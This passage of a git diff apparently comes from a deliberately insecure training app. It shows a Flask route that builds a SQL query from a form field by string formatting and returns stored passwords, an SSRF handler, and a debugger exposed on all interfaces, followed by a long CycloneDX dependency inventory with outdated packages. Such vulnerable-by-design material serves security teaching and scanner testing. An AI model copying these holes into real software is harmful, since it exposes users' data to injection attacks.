output = f"SSRF Error: {e}" + + # 8 - SQL injection with parameter instead of whole query + elif 'username' in request.form: + username = request.form['username'] + try: + # Vulnerable SQL query using string interpolation + query = "SELECT password FROM users WHERE username = '{}'".format(username) + cursor.execute(query) + result = cursor.fetchone() + if result: + output = f"Password for {username}: {result[0]}" + else: + output = "User not found." + except Exception as e: + output = f"SQL Error: {e}" + + return render_template('result.html', output=output, script_name=SCRIPT_NAME) + +# Mount the Flask app under /app +application = DispatcherMiddleware(Flask('dummy_app'), { + '/app': app +}) if __name__ == '__main__': - app.run(host='0.0.0.0', port=8080, debug=True) + # Set environment to development for local testing + os.environ['FLASK_ENV'] = 'development' + run_simple('0.0.0.0', 8080, application, use_reloader=True, use_debugger=True) + diff --git a/insecure-app/bom.json b/insecure-app/bom.json new file mode 100644 index 0000000..9b65325 --- /dev/null +++ b/insecure-app/bom.json @@ -0,0 +1,11000 @@ +{ + "bomFormat": "CycloneDX", + "specVersion": "1.5", + "serialNumber": "urn:uuid:c9e98a75-63d4-495f-9706-de350a323ee5", + "version": 1, + "metadata": { + "timestamp": "2024-05-19T23:01:25Z", + "tools": { + "components": [ + { + "group": "@cyclonedx", + "name": "cdxgen", + "version": "10.5.1", + "purl": "pkg:npm/%40cyclonedx/cdxgen@10.5.1", + "type": "application", + "bom-ref": "pkg:npm/@cyclonedx/cdxgen@10.5.1", + "author": "OWASP Foundation", + "publisher": "OWASP Foundation" + } + ] + }, + "authors": [ + { + "name": "OWASP Foundation" + } + ], + "lifecycles": [ + { + "phase": "build" + } + ], + "component": { + "group": "", + "name": "insecure-app", + "version": "latest", + "type": "application", + "bom-ref": "pkg:gem/insecure-app@latest", + "purl": "pkg:gem/insecure-app@latest" + } + }, + "components": [ + { + "group": "", + "name": "bottleneck", + "version": "latest", + "purl": "pkg:pypi/bottleneck@latest", + "type": "framework", + "bom-ref": "pkg:pypi/bottleneck@latest", + "evidence": { + "identity": { + "field": "purl", + "confidence": 1, + "methods": [ + { + "technique": "instrumentation", + "confidence": 1, + "value": "/home/confusedcrib/git/insecure-kubernetes-deployments/insecure-app/test" + } + ] + } + } + }, + { + "group": "", + "name": "numpy", + "version": "1.24.3", + "purl": "pkg:pypi/numpy@1.24.3", + "type": "framework", + "bom-ref": "pkg:pypi/numpy@1.24.3", + "evidence": { + "identity": { + "field": "purl", + "confidence": 0.8, + "methods": [ + { + "technique": "manifest-analysis", + "confidence": 0.8, + "value": "/home/confusedcrib/git/insecure-kubernetes-deployments/insecure-app/requirements.txt" + } + ] + } + }, + "properties": [ + { + "name": "SrcFile", + "value": "/home/confusedcrib/git/insecure-kubernetes-deployments/insecure-app/requirements.txt" + } + ] + }, + { + "group": "", + "name": "heapdict", + "version": "latest", + "purl": "pkg:pypi/heapdict@latest", + "type": "library", + "bom-ref": "pkg:pypi/heapdict@latest", + "evidence": { + "identity": { + "field": "purl", + "confidence": 1, + "methods": [ + { + "technique": "instrumentation", + "confidence": 1, + "value": "/home/confusedcrib/git/insecure-kubernetes-deployments/insecure-app/test" + } + ] + } + } + }, + { + "group": "", + "name": "markdown", + "version": "latest", + "purl": "pkg:pypi/markdown@latest", + "type": "library", + "bom-ref": "pkg:pypi/markdown@latest", + "evidence": { + "identity": { + "field": "purl", + "confidence": 1, + "methods": [ + { + "technique": "instrumentation", + "confidence": 1, + "value": "/home/confusedcrib/git/insecure-kubernetes-deployments/insecure-app/test" + } + ] + } + } + }, + { + "group": "", + "name": "pillow", + "version": "latest", + "purl": "pkg:pypi/pillow@latest", + "type": "library", + "bom-ref": "pkg:pypi/pillow@latest", + "evidence": { + "identity": { + "field": "purl", + "confidence": 1, + "methods": [ + { + "technique": "instrumentation", + "confidence": 1, + "value": "/home/confusedcrib/git/insecure-kubernetes-deployments/insecure-app/test" + } + ] + } + } + }, + { + "group": "", + "name": "pyqt5-sip", + "version": "12.11.0", + "purl": "pkg:pypi/pyqt5-sip@12.11.0", + "type": "framework", + "bom-ref": "pkg:pypi/pyqt5-sip@12.11.0", + "evidence": { + "identity": { + "field": "purl", + "confidence": 1, + "methods": [ + { + "technique": "instrumentation", + "confidence": 1, + "value": "/home/confusedcrib/git/insecure-kubernetes-deployments/insecure-app/test" + } + ] + } + } + }, + { + "group": "", + "name": "pysocks", + "version": "latest", + "purl": "pkg:pypi/pysocks@latest", + "type": "library", + "bom-ref": "pkg:pypi/pysocks@latest", + "evidence": { + "identity": { + "field": "purl", + "confidence": 1, + "methods": [ + { + "technique": "instrumentation", + "confidence": 1, + "value": "/home/confusedcrib/git/insecure-kubernetes-deployments/insecure-app/test" + } + ] + } + } + }, + { + "group": "", + "name": "pywavelets", + "version": "latest", + "purl": "pkg:pypi/pywavelets@latest", + "type": "library", + "bom-ref": "pkg:pypi/pywavelets@latest", + "evidence": { + "identity": { + "field": "purl", + "confidence": 1, + "methods": [ + { + "technique": "instrumentation", + "confidence": 1, + "value": "/home/confusedcrib/git/insecure-kubernetes-deployments/insecure-app/test" + } + ] + } + } + }, + { + "group": "", + "name": "qdarkstyle", + "version": "latest", + "purl": "pkg:pypi/qdarkstyle@latest", + "type": "library", + "bom-ref": "pkg:pypi/qdarkstyle@latest", + "evidence": { + "identity": { + "field": "purl", + "confidence": 1, + "methods": [ + { + "technique": "instrumentation", + "confidence": 1, + "value": "/home/confusedcrib/git/insecure-kubernetes-deployments/insecure-app/test" + } + ] + } + } + }, + { + "group": "", + "name": "QtPy", + "version": "2.2.0", + "purl": "pkg:pypi/qtpy@2.2.0", + "type": "library", + "bom-ref": "pkg:pypi/qtpy@2.2.0", + "evidence": { + "identity": { + "field": "purl", + "confidence": 0.8, + "methods": [ + { + "technique": "manifest-analysis", + "confidence": 0.8, + "value": "/home/confusedcrib/git/insecure-kubernetes-deployments/insecure-app/requirements.txt" + } + ] + } + }, + "properties": [ + { + "name": "SrcFile", + "value": "/home/confusedcrib/git/insecure-kubernetes-deployments/insecure-app/requirements.txt" + } + ] + }, + { + "group": "", + "name": "packaging", + "version": "23.1", + "purl": "pkg:pypi/packaging@23.1", + "type": "library", + "bom-ref": "pkg:pypi/packaging@23.1", + "evidence": { + "identity": { + "field": "purl", + "confidence": 0.8, + "methods": [ + { + "technique": "manifest-analysis", + "confidence": 0.8, + "value": "/home/confusedcrib/git/insecure-kubernetes-deployments/insecure-app/requirements.txt" + } + ] + } + }, + "properties": [ + { + "name": "SrcFile", + "value": "/home/confusedcrib/git/insecure-kubernetes-deployments/insecure-app/requirements.txt" + } + ] + }, + { + "group": "", + "name": "qtawesome", + "version": "latest", + "purl": "pkg:pypi/qtawesome@latest", + "type": "library", + "bom-ref": "pkg:pypi/qtawesome@latest", + "evidence": { + "identity": { + "field": "purl", + "confidence": 1, + "methods": [ + { + "technique": "instrumentation", + "confidence": 1, + "value": "/home/confusedcrib/git/insecure-kubernetes-deployments/insecure-app/test" + } + ] + } + } + }, + { + "group": "", + "name": "rtree", + "version": "latest", + "purl": "pkg:pypi/rtree@latest", + "type": "library", + "bom-ref": "pkg:pypi/rtree@latest", + "evidence": { + "identity": { + "field": "purl", + "confidence": 1, + "methods": [ + { + "technique": "instrumentation", + "confidence": 1, + "value": "/home/confusedcrib/git/insecure-kubernetes-deployments/insecure-app/test" + } + ] + } + } + }, + { + "group": "", + "name": "sqlalchemy", + "version": "latest", + "purl": "pkg:pypi/sqlalchemy@latest", + "type": "library", + "bom-ref": "pkg:pypi/sqlalchemy@latest", + "evidence": { + "identity": { + "field": "purl", + "confidence": 1, + "methods": [ + { + "technique": "instrumentation", + "confidence": 1, + "value": "/home/confusedcrib/git/insecure-kubernetes-deployments/insecure-app/test" + } + ] + } + } + }, + { + "group": "", + "name": "greenlet", + "version": "2.0.1", + "purl": "pkg:pypi/greenlet@2.0.1", + "type": "library", + "bom-ref": "pkg:pypi/greenlet@2.0.1", + "evidence": { + "identity": { + "field": "purl", + "confidence": 0.8, + "methods": [ + { + "technique": "manifest-analysis", + "confidence": 0.8, + "value": "/home/confusedcrib/git/insecure-kubernetes-deployments/insecure-app/requirements.txt" + } + ] + } + }, + "properties": [ + { + "name": "SrcFile", + "value": "/home/confusedcrib/git/insecure-kubernetes-deployments/insecure-app/requirements.txt" + } + ] + }, + { + "group": "", + "name": "scrapy", + "version": "latest", + "purl": "pkg:pypi/scrapy@latest", + "type": "library", + "bom-ref": "pkg:pypi/scrapy@latest", + "evidence": { + "identity": { + "field": "purl", + "confidence": 1, + "methods": [ + { + "technique": "instrumentation", + "confidence": 1, + "value": "/home/confusedcrib/git/insecure-kubernetes-deployments/insecure-app/test" + } + ] + } + } + }, + { + "group": "", + "name": "Twisted", + "version": "22.10.0", + "purl": "pkg:pypi/twisted@22.10.0", + "type": "library", + "bom-ref": "pkg:pypi/twisted@22.10.0", + "evidence": { + "identity": { + "field": "purl", + "confidence": 0.8, + "methods": [ + { + "technique": "manifest-analysis", + "confidence": 0.8, + "value": "/home/confusedcrib/git/insecure-kubernetes-deployments/insecure-app/requirements.txt" + } + ] + } + }, + "properties": [ + { + "name": "SrcFile", + "value": "/home/confusedcrib/git/insecure-kubernetes-deployments/insecure-app/requirements.txt" + } + ] + }, + { + "group": "", + "name": "zope.interface", + "version": "5.4.0", + "purl": "pkg:pypi/zope.interface@5.4.0", + "type": "library", + "bom-ref": "pkg:pypi/zope.interface@5.4.0", + "evidence": { + "identity": { + "field": "purl", + "confidence": 0.8, + "methods": [ + { + "technique": "manifest-analysis", + "confidence": 0.8, + "value": "/home/confusedcrib/git/insecure-kubernetes-deployments/insecure-app/requirements.txt" + } + ] + } + }, + "properties": [ + { + "name": "SrcFile", + "value": "/home/confusedcrib/git/insecure-kubernetes-deployments/insecure-app/requirements.txt" + } + ] + }, + { + "group": "", + "name": "setuptools", + "version": "68.0.0", + "purl": "pkg:pypi/setuptools@68.0.0", + "type": "library", + "bom-ref": "pkg:pypi/setuptools@68.0.0", + "evidence": { + "identity": { + "field": "purl", + "confidence": 0.8, + "methods": [ + { + "technique": "manifest-analysis", + "confidence": 0.8, + "value": "/home/confusedcrib/git/insecure-kubernetes-deployments/insecure-app/requirements.txt" + } + ] + } + }, + "properties": [ + { + "name": "SrcFile", + "value": "/home/confusedcrib/git/insecure-kubernetes-deployments/insecure-app/requirements.txt" + } + ] + }, + { + "group": "", + "name": "constantly", + "version": "15.1.0", + "purl": "pkg:pypi/constantly@15.1.0", + "type": "library", + "bom-ref": "pkg:pypi/constantly@15.1.0", + "evidence": { + "identity": { + "field": "purl", + "confidence": 0.8, + "methods": [ + { + "technique": "manifest-analysis", + "confidence": 0.8, + "value": "/home/confusedcrib/git/insecure-kubernetes-deployments/insecure-app/requirements.txt" + } + ] + } + }, + "properties": [ + { + "name": "SrcFile", + "value": "/home/confusedcrib/git/insecure-kubernetes-deployments/insecure-app/requirements.txt" + } + ] + }, + { + "group": "", + "name": "incremental", + "version": "21.3.0", + "purl": "pkg:pypi/incremental@21.3.0", + "type": "library", + "bom-ref": "pkg:pypi/incremental@21.3.0", + "evidence": { + "identity": { + "field": "purl", + "confidence": 0.8, + "methods": [ + { + "technique": "manifest-analysis", + "confidence": 0.8, + "value": "/home/confusedcrib/git/insecure-kubernetes-deployments/insecure-app/requirements.txt" + } + ] + } + }, + "properties": [ + { + "name": "SrcFile", + "value": "/home/confusedcrib/git/insecure-kubernetes-deployments/insecure-app/requirements.txt" + } + ] + }, + { + "group": "", + "name": "Automat", + "version": "20.2.0", + "purl": "pkg:pypi/automat@20.2.0", + "type": "library", + "bom-ref": "pkg:pypi/automat@20.2.0", + "evidence": { + "identity": { + "field": "purl", + "confidence": 0.8, + "methods": [ + { + "technique": "manifest-analysis", + "confidence": 0.8, + "value": "/home/confusedcrib/git/insecure-kubernetes-deployments/insecure-app/requirements.txt" + } + ] + } + }, + "properties": [ + { + "name": "SrcFile", + "value": "/home/confusedcrib/git/insecure-kubernetes-deployments/insecure-app/requirements.txt" + } + ] + }, + { + "group": "", + "name": "attrs", + "version": "22.1.0", + "purl": "pkg:pypi/attrs@22.1.0", + "type": "library", + "bom-ref": "pkg:pypi/attrs@22.1.0", + "evidence": { + "identity": { + "field": "purl", + "confidence": 0.8, + "methods": [ + { + "technique": "manifest-analysis", + "confidence": 0.8, + "value": "/home/confusedcrib/git/insecure-kubernetes-deployments/insecure-app/requirements.txt" + } + ] + } + }, + "properties": [ + { + "name": "SrcFile", + "value": "/home/confusedcrib/git/insecure-kubernetes-deployments/insecure-app/requirements.txt" + } + ] + }, + { + "group": "", + "name": "six", + "version": "1.16.0", + "purl": "pkg:pypi/six@1.16.0", + "type": "library", + "bom-ref": "pkg:pypi/six@1.16.0", + "evidence": { + "identity": { + "field": "purl", + "confidence": 0.8, + "methods": [ + { + "technique": "manifest-analysis", + "confidence": 0.8, + "value": "/home/confusedcrib/git/insecure-kubernetes-deployments/insecure-app/requirements.txt" + } + ] + } + }, + "properties": [ + { + "name": "SrcFile", + "value": "/home/confusedcrib/git/insecure-kubernetes-deployments/insecure-app/requirements.txt" + } + ] + }, + { + "group": "", + "name": "hyperlink", + "version": "21.0.0", + "purl": "pkg:pypi/hyperlink@21.0.0", + "type": "library", + "bom-ref": "pkg:pypi/hyperlink@21.0.0", + "evidence": { + "identity": { + "field": "purl", + "confidence": 0.8, + "methods": [ + { + "technique": "manifest-analysis", + "confidence": 0.8, + "value": "/home/confusedcrib/git/insecure-kubernetes-deployments/insecure-app/requirements.txt" + } + ] + } + }, + "properties": [ + { + "name": "SrcFile", + "value": "/home/confusedcrib/git/insecure-kubernetes-deployments/insecure-app/requirements.txt" + } + ] + }, + { + "group": "", + "name": "idna", + "version": "2.7", + "purl": "pkg:pypi/idna@2.7", + "type": "library", + "bom-ref": "pkg:pypi/idna@2.7", + "evidence": { + "identity": { + "field": "purl", + "confidence": 0.8, + "methods": [ + { + "technique": "manifest-analysis", + "confidence": 0.8, + "value": "/home/confusedcrib/git/insecure-kubernetes-deployments/insecure-app/requirements.txt" + } + ] + } + }, + "properties": [ + { + "name": "SrcFile", + "value": "/home/confusedcrib/git/insecure-kubernetes-deployments/insecure-app/requirements.txt" + } + ] + }, + { + "group": "", + "name": "typing-extensions", + "version": "4.7.1", + "purl": "pkg:pypi/typing-extensions@4.7.1", + "type": "library", + "bom-ref": "pkg:pypi/typing-extensions@4.7.1", + "evidence": { + "identity": { + "field": "purl", + "confidence": 0.8, + "methods": [ + { + "technique": "manifest-analysis", + "confidence": 0.8, + "value": "/home/confusedcrib/git/insecure-kubernetes-deployments/insecure-app/requirements.txt" + } + ] + } + }, + "properties": [ + { + "name": "SrcFile", + "value": "/home/confusedcrib/git/insecure-kubernetes-deployments/insecure-app/requirements.txt" + } + ] + }, + { + "group": "", + "name": "cryptography", + "version": "3.3.2", + "purl": "pkg:pypi/cryptography@3.3.2", + "type": "library", + "bom-ref": "pkg:pypi/cryptography@3.3.2", + "evidence": { + "identity": { + "field": "purl", + "confidence": 0.8, + "methods": [ + { + "technique": "manifest-analysis", + "confidence": 0.8, + "value": "/home/confusedcrib/git/insecure-kubernetes-deployments/insecure-app/requirements.txt" + } + ] + } + }, + "properties": [ + { + "name": "SrcFile", + "value": "/home/confusedcrib/git/insecure-kubernetes-deployments/insecure-app/requirements.txt" + } + ] + }, + { + "group": "", + "name": "cffi", + "version": "1.15.1", + "purl": "pkg:pypi/cffi@1.15.1", + "type": "library", + "bom-ref": "pkg:pypi/cffi@1.15.1", + "evidence": { + "identity": { + "field": "purl", + "confidence": 0.8, + "methods": [ + { + "technique": "manifest-analysis", + "confidence": 0.8, + "value": "/home/confusedcrib/git/insecure-kubernetes-deployments/insecure-app/requirements.txt" + } + ] + } + }, + "properties": [ + { + "name": "SrcFile", + "value": "/home/confusedcrib/git/insecure-kubernetes-deployments/insecure-app/requirements.txt" + } + ] + }, + { + "group": "", + "name": "pycparser", + "version": "2.21", + "purl": "pkg:pypi/pycparser@2.21", + "type": "library", + "bom-ref": "pkg:pypi/pycparser@2.21", + "evidence": { + "identity": { + "field": "purl", + "confidence": 0.8, + "methods": [ + { + "technique": "manifest-analysis", + "confidence": 0.8, + "value": "/home/confusedcrib/git/insecure-kubernetes-deployments/insecure-app/requirements.txt" + } + ] + } + }, + "properties": [ + { + "name": "SrcFile", + "value": "/home/confusedcrib/git/insecure-kubernetes-deployments/insecure-app/requirements.txt" + } + ] + }, + { + "group": "", + "name": "cssselect", + "version": "1.1.0", + "purl": "pkg:pypi/cssselect@1.1.0", + "type": "library", + "bom-ref": "pkg:pypi/cssselect@1.1.0", + "evidence": { + "identity": { + "field": "purl", + "confidence": 0.8, + "methods": [ + { + "technique": "manifest-analysis", + "confidence": 0.8, + "value": "/home/confusedcrib/git/insecure-kubernetes-deployments/insecure-app/requirements.txt" + } + ] + } + }, + "properties": [ + { + "name": "SrcFile", + "value": "/home/confusedcrib/git/insecure-kubernetes-deployments/insecure-app/requirements.txt" + } + ] + }, + { + "group": "", + "name": "itemloaders", + "version": "1.0.4", + "purl": "pkg:pypi/itemloaders@1.0.4", + "type": "library", + "bom-ref": "pkg:pypi/itemloaders@1.0.4", + "evidence": { + "identity": { + "field": "purl", + "confidence": 0.8, + "methods": [ + { + "technique": "manifest-analysis", + "confidence": 0.8, + "value": "/home/confusedcrib/git/insecure-kubernetes-deployments/insecure-app/requirements.txt" + } + ] + } + }, + "properties": [ + { + "name": "SrcFile", + "value": "/home/confusedcrib/git/insecure-kubernetes-deployments/insecure-app/requirements.txt" + } + ] + }, + { + "group": "", + "name": "w3lib", + "version": "1.21.0", + "purl": "pkg:pypi/w3lib@1.21.0", + "type": "library", + "bom-ref": "pkg:pypi/w3lib@1.21.0", + "evidence": { + "identity": { + "field": "purl", + "confidence": 0.8, + "methods": [ + { + "technique": "manifest-analysis", + "confidence": 0.8, + "value": "/home/confusedcrib/git/insecure-kubernetes-deployments/insecure-app/requirements.txt" + } + ] + } + }, + "properties": [ + { + "name": "SrcFile", + "value": "/home/confusedcrib/git/insecure-kubernetes-deployments/insecure-app/requirements.txt" + } + ] + }, + { + "group": "", + "name": "parsel", + "version": "1.6.0", + "purl": "pkg:pypi/parsel@1.6.0", + "type": "library", + "bom-ref": "pkg:pypi/parsel@1.6.0", + "evidence": { + "identity": { + "field": "purl", + "confidence": 0.8, + "methods": [ + { + "technique": "manifest-analysis", + "confidence": 0.8, + "value": "/home/confusedcrib/git/insecure-kubernetes-deployments/insecure-app/requirements.txt" + } + ] + } + }, + "properties": [ + { + "name": "SrcFile", + "value": "/home/confusedcrib/git/insecure-kubernetes-deployments/insecure-app/requirements.txt" + } + ] + }, + { + "group": "", + "name": "lxml", + "version": "4.9.3", + "purl": "pkg:pypi/lxml@4.9.3", + "type": "library", + "bom-ref": "pkg:pypi/lxml@4.9.3", + "evidence": { + "identity": { + "field": "purl", + "confidence": 0.8, + "methods": [ + { + "technique": "manifest-analysis", + "confidence": 0.8, + "value": "/home/confusedcrib/git/insecure-kubernetes-deployments/insecure-app/requirements.txt" + } + ] + } + }, + "properties": [ + { + "name": "SrcFile", + "value": "/home/confusedcrib/git/insecure-kubernetes-deployments/insecure-app/requirements.txt" + } + ] + }, + { + "group": "", + "name": "jmespath", + "version": "0.10.0", + "purl": "pkg:pypi/jmespath@0.10.0", + "type": "library", + "bom-ref": "pkg:pypi/jmespath@0.10.0", + "evidence": { + "identity": { + "field": "purl", + "confidence": 0.8, + "methods": [ + { + "technique": "manifest-analysis", + "confidence": 0.8, + "value": "/home/confusedcrib/git/insecure-kubernetes-deployments/insecure-app/requirements.txt" + } + ] + } + }, + "properties": [ + { + "name": "SrcFile", + "value": "/home/confusedcrib/git/insecure-kubernetes-deployments/insecure-app/requirements.txt" + } + ] + }, + { + "group": "", + "name": "itemadapter", + "version": "0.3.0", + "purl": "pkg:pypi/itemadapter@0.3.0", + "type": "library", + "bom-ref": "pkg:pypi/itemadapter@0.3.0", + "evidence": { + "identity": { + "field": "purl", + "confidence": 0.8, + "methods": [ + { + "technique": "manifest-analysis", + "confidence": 0.8, + "value": "/home/confusedcrib/git/insecure-kubernetes-deployments/insecure-app/requirements.txt" + } + ] + } + }, + "properties": [ + { + "name": "SrcFile", + "value": "/home/confusedcrib/git/insecure-kubernetes-deployments/insecure-app/requirements.txt" + } + ] + }, + { + "group": "", + "name": "pyOpenSSL", + "version": "23.2.0", + "purl": "pkg:pypi/pyopenssl@23.2.0", + "type": "library", + "bom-ref": "pkg:pypi/pyopenssl@23.2.0", + "evidence": { + "identity": { + "field": "purl", + "confidence": 0.8, + "methods": [ + { + "technique": "manifest-analysis", + "confidence": 0.8, + "value": "/home/confusedcrib/git/insecure-kubernetes-deployments/insecure-app/requirements.txt" + } + ] + } + }, + "properties": [ + { + "name": "SrcFile", + "value": "/home/confusedcrib/git/insecure-kubernetes-deployments/insecure-app/requirements.txt" + } + ] + }, + { + "group": "", + "name": "queuelib", + "version": "1.5.0", + "purl": "pkg:pypi/queuelib@1.5.0", + "type": "library", + "bom-ref": "pkg:pypi/queuelib@1.5.0", + "evidence": { + "identity": { + "field": "purl", + "confidence": 0.8, + "methods": [ + { + "technique": "manifest-analysis", + "confidence": 0.8, + "value": "/home/confusedcrib/git/insecure-kubernetes-deployments/insecure-app/requirements.txt" + } + ] + } + }, + "properties": [ + { + "name": "SrcFile", + "value": "/home/confusedcrib/git/insecure-kubernetes-deployments/insecure-app/requirements.txt" + } + ] + }, + { + "group": "", + "name": "service-identity", + "version": "18.1.0", + "purl": "pkg:pypi/service-identity@18.1.0", + "type": "library", + "bom-ref": "pkg:pypi/service-identity@18.1.0", + "evidence": { + "identity": { + "field": "purl", + "confidence": 0.8, + "methods": [ + { + "technique": "manifest-analysis", + "confidence": 0.8, + "value": "/home/confusedcrib/git/insecure-kubernetes-deployments/insecure-app/requirements.txt" + } + ] + } + }, + "properties": [ + { + "name": "SrcFile", + "value": "/home/confusedcrib/git/insecure-kubernetes-deployments/insecure-app/requirements.txt" + } + ] + }, + { + "group": "", + "name": "pyasn1-modules", + "version": "0.2.8", + "purl": "pkg:pypi/pyasn1-modules@0.2.8", + "type": "library", + "bom-ref": "pkg:pypi/pyasn1-modules@0.2.8", + "evidence": { + "identity": { + "field": "purl", + "confidence": 0.8, + "methods": [ + { + "technique": "manifest-analysis", + "confidence": 0.8, + "value": "/home/confusedcrib/git/insecure-kubernetes-deployments/insecure-app/requirements.txt" + } + ] + } + }, + "properties": [ + { + "name": "SrcFile", + "value": "/home/confusedcrib/git/insecure-kubernetes-deployments/insecure-app/requirements.txt" + } + ] + }, + { + "group": "", + "name": "pyasn1", + "version": "0.4.8", + "purl": "pkg:pypi/pyasn1@0.4.8", + "type": "library", + "bom-ref": "pkg:pypi/pyasn1@0.4.8", + "evidence": { + "identity": { + "field": "purl", + "confidence": 0.8, + "methods": [ + { + "technique": "manifest-analysis", + "confidence": 0.8, + "value": "/home/confusedcrib/git/insecure-kubernetes-deployments/insecure-app/requirements.txt" + } + ] + } + }, + "properties": [ + { + "name": "SrcFile", + "value": "/home/confusedcrib/git/insecure-kubernetes-deployments/insecure-app/requirements.txt" + } + ] + }, + { + "group": "", + "name": "Protego", + "version": "0.1.16", + "purl": "pkg:pypi/protego@0.1.16", + "type": "library", + "bom-ref": "pkg:pypi/protego@0.1.16", + "evidence": { + "identity": { + "field": "purl", + "confidence": 0.8, + "methods": [ + { + "technique": "manifest-analysis", + "confidence": 0.8, + "value": "/home/confusedcrib/git/insecure-kubernetes-deployments/insecure-app/requirements.txt" + } + ] + } + }, + "properties": [ + { + "name": "SrcFile", + "value": "/home/confusedcrib/git/insecure-kubernetes-deployments/insecure-app/requirements.txt" + } + ] + }, + { + "group": "", + "name": "tldextract", + "version": "3.2.0", + "purl": "pkg:pypi/tldextract@3.2.0", + "type": "library", + "bom-ref": "pkg:pypi/tldextract@3.2.0", + "evidence": { + "identity": { + "field": "purl", + "confidence": 0.8, + "methods": [ + { + "technique": "manifest-analysis", + "confidence": 0.8, + "value": "/home/confusedcrib/git/insecure-kubernetes-deployments/insecure-app/requirements.txt" + } + ] + } + }, + "properties": [ + { + "name": "SrcFile", + "value": "/home/confusedcrib/git/insecure-kubernetes-deployments/insecure-app/requirements.txt" + } + ] + }, + { + "group": "", + "name": "requests", + "version": "2.19.1", + "purl": "pkg:pypi/requests@2.19.1", + "type": "library", + "bom-ref": "pkg:pypi/requests@2.19.1", + "evidence": { + "identity": { + "field": "purl", + "confidence": 0.8, + "methods": [ + { + "technique": "manifest-analysis", + "confidence": 0.8, + "value": "/home/confusedcrib/git/insecure-kubernetes-deployments/insecure-app/requirements.txt" + } + ] + } + }, + "properties": [ + { + "name": "SrcFile", + "value": "/home/confusedcrib/git/insecure-kubernetes-deployments/insecure-app/requirements.txt" + } + ] + }, + { + "group": "", + "name": "chardet", + "version": "3.0.4", + "purl": "pkg:pypi/chardet@3.0.4", + "type": "library", + "bom-ref": "pkg:pypi/chardet@3.0.4", + "evidence": { + "identity": { + "field": "purl", + "confidence": 0.8, + "methods": [ + { + "technique": "manifest-analysis", + "confidence": 0.8, + "value": "/home/confusedcrib/git/insecure-kubernetes-deployments/insecure-app/requirements.txt" + } + ] + } + }, + "properties": [ + { + "name": "SrcFile", + "value": "/home/confusedcrib/git/insecure-kubernetes-deployments/insecure-app/requirements.txt" + } + ] + }, + { + "group": "", + "name": "urllib3", + "version": "1.23", + "purl": "pkg:pypi/urllib3@1.23", + "type": "library", + "bom-ref": "pkg:pypi/urllib3@1.23", + "evidence": { + "identity": { + "field": "purl", + "confidence": 0.8, + "methods": [ + { + "technique": "manifest-analysis", + "confidence": 0.8, + "value": "/home/confusedcrib/git/insecure-kubernetes-deployments/insecure-app/requirements.txt" + } + ] + } + }, + "properties": [ + { + "name": "SrcFile", + "value": "/home/confusedcrib/git/insecure-kubernetes-deployments/insecure-app/requirements.txt" + } + ] + }, + { + "group": "", + "name": "certifi", + "version": "2023.7.22", + "purl": "pkg:pypi/certifi@2023.7.22", + "type": "library", + "bom-ref": "pkg:pypi/certifi@2023.7.22", + "evidence": { + "identity": { + "field": "purl", + "confidence": 0.8, + "methods": [ + { + "technique": "manifest-analysis", + "confidence": 0.8, + "value": "/home/confusedcrib/git/insecure-kubernetes-deployments/insecure-app/requirements.txt" + } + ] + } + }, + "properties": [ + { + "name": "SrcFile", + "value": "/home/confusedcrib/git/insecure-kubernetes-deployments/insecure-app/requirements.txt" + } + ] + }, + { + "group": "", + "name": "requests-file", + "version": "1.5.1", + "purl": "pkg:pypi/requests-file@1.5.1", + "type": "library", + "bom-ref": "pkg:pypi/requests-file@1.5.1", + "evidence": { + "identity": { + "field": "purl", + "confidence": 0.8, + "methods": [ + { + "technique": "manifest-analysis", + "confidence": 0.8, + "value": "/home/confusedcrib/git/insecure-kubernetes-deployments/insecure-app/requirements.txt" + } + ] + } + }, + "properties": [ + { + "name": "SrcFile", + "value": "/home/confusedcrib/git/insecure-kubernetes-deployments/insecure-app/requirements.txt" + } + ] + }, + { + "group": "", + "name": "filelock", + "version": "3.9.0", + "purl": "pkg:pypi/filelock@3.9.0", + "type": "library", + "bom-ref": "pkg:pypi/filelock@3.9.0", + "evidence": { + "identity": { + "field": "purl", + "confidence": 0.8, + "methods": [ + { + "technique": "manifest-analysis", + "confidence": 0.8, + "value": "/home/confusedcrib/git/insecure-kubernetes-deployments/insecure-app/requirements.txt" + } + ] + } + }, + "properties": [ + { + "name": "SrcFile", + "value": "/home/confusedcrib/git/insecure-kubernetes-deployments/insecure-app/requirements.txt" + } + ] + }, + { + "group": "", + "name": "PyDispatcher", + "version": "2.0.5", + "purl": "pkg:pypi/pydispatcher@2.0.5", + "type": "library", + "bom-ref": "pkg:pypi/pydispatcher@2.0.5", + "evidence": { + "identity": { + "field": "purl", + "confidence": 0.8, + "methods": [ + { + "technique": "manifest-analysis", + "confidence": 0.8, + "value": "/home/confusedcrib/git/insecure-kubernetes-deployments/insecure-app/requirements.txt" + } + ] + } + }, + "properties": [ + { + "name": "SrcFile", + "value": "/home/confusedcrib/git/insecure-kubernetes-deployments/insecure-app/requirements.txt" + } + ] + }, + { + "group": "", + "name": "secretstorage", + "version": "latest", + "purl": "pkg:pypi/secretstorage@latest", + "type": "library", + "bom-ref": "pkg:pypi/secretstorage@latest", + "evidence": { + "identity": { + "field": "purl", + "confidence": 1, + "methods": [ + { + "technique": "instrumentation", + "confidence": 1, + "value": "/home/confusedcrib/git/insecure-kubernetes-deployments/insecure-app/test" + } + ] + } + } + }, + { + "group": "", + "name": "jeepney", + "version": "0.7.1", + "purl": "pkg:pypi/jeepney@0.7.1", + "type": "library", + "bom-ref": "pkg:pypi/jeepney@0.7.1", + "evidence": { + "identity": { + "field": "purl", + "confidence": 0.8, + "methods": [ + { + "technique": "manifest-analysis", + "confidence": 0.8, + "value": "/home/confusedcrib/git/insecure-kubernetes-deployments/insecure-app/requirements.txt" + } + ] + } + }, + "properties": [ + { + "name": "SrcFile", + "value": "/home/confusedcrib/git/insecure-kubernetes-deployments/insecure-app/requirements.txt" + } + ] + }, + { + "group": "", + "name": "send2trash", + "version": "latest", + "purl": "pkg:pypi/send2trash@latest", + "type": "library", + "bom-ref": "pkg:pypi/send2trash@latest", + "evidence": { + "identity": { + "field": "purl", + "confidence": 1, + "methods": [ + { + "technique": "instrumentation", + "confidence": 1, + "value": "/home/confusedcrib/git/insecure-kubernetes-deployments/insecure-app/test" + } + ] + } + } + }, + { + "group": "", + "name": "sphinx", + "version": "latest", + "purl": "pkg:pypi/sphinx@latest", + "type": "library", + "bom-ref": "pkg:pypi/sphinx@latest", + "evidence": { + "identity": { + "field": "purl", + "confidence": 1, + "methods": [ + { + "technique": "instrumentation", + "confidence": 1, + "value": "/home/confusedcrib/git/insecure-kubernetes-deployments/insecure-app/test" + } + ] + } + } + }, + { + "group": "", + 